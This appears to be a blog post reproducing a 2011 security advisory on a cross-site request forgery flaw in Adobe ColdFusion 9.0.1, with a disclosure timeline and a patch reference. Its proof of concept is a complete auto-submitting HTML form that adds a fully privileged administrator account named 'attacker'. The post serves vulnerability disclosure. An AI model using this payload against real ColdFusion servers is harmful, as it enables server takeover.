Adobe ColdFusion application server enables developers to rapidly build, deploy, and maintain robust Internet applications for the enterprise.
Sow Ching Shiong, an independent vulnerability researcher has discovered Cross-Site Request Forgery vulnerability in Adobe ColdFusion. This issue was discovered in a default installation of Adobe ColdFusion 9.0.1.274733. Other earlier versions may also be affected.
Proof of concept
<html>
<body>
<form action="http://[target]:8500/CFIDE/administrator/security/useredit.cfm" id="csrf" method="post">
<input type="hidden" name="uname" value="attacker" />
<input type="hidden" name="password1" value="passwd123" />
<input type="hidden" name="password2" value="passwd123" />
<input type="hidden" name="Description" value="" />
<input type="hidden" name="userallowrds" value="true" />
<input type="hidden" name="userallowadministrative" value="true" />
<input type="hidden" name="userallow" value="adminapi" />
<input type="hidden" name="grantedRoles" value="coldfusion.collections,coldfusion.datasources,coldfusion.flexdataservices,coldfusion.migrateveritycollections,coldfusion.solrserver,coldfusion.verityk2server,coldfusion.webservices,coldfusion.codeanalyzer,coldfusion.debugging,coldfusion.licensescanner,coldfusion.logging,coldfusion.scheduledtasks,coldfusion.systemprobes,coldfusion.enterprisemanager,coldfusion.eventgateways,coldfusion.cfxtags,coldfusion.corbaconnectors,coldfusion.customtagpaths,coldfusion.applets,coldfusion.packagingdeployment,coldfusion.sandboxsecurity,coldfusion.monitoring,coldfusion.serversettings,coldfusion.serversettingssummary" />
<input type="hidden" name="grantedSandboxes" value="C:\ColdFusion9\wwwroot\CFIDE\,C:\ColdFusion9\wwwroot\WEB-INF\" />
<input type="hidden" name="grantedServices" value="mail,document,pdf,image,chart,pop,upload" />
<input type="hidden" name="adminaction" value="add" />
</form>
<script>
document.getElementById('csrf').submit();
</script>
</body>
</html>
Solution
Adobe has released patches which address this issue. Please see the references for more information.
References
Vendor URL: http://www.adobe.com/support/security/bulletins/apsb11-14.html
Secunia: http://secunia.com/advisories/43013/
Disclosure Timeline
2011-01-21 - Vulnerability discovered.
2011-01-21 - Vulnerability reported to Secunia.
2011-01-21 - Secunia confirmed the vulnerability and contacted the vendor.
2011-06-14 - Patch released.
2011-06-15 - Advisory published by Secunia.
No comments:
Post a Comment
Note: Only a member of this blog may post a comment.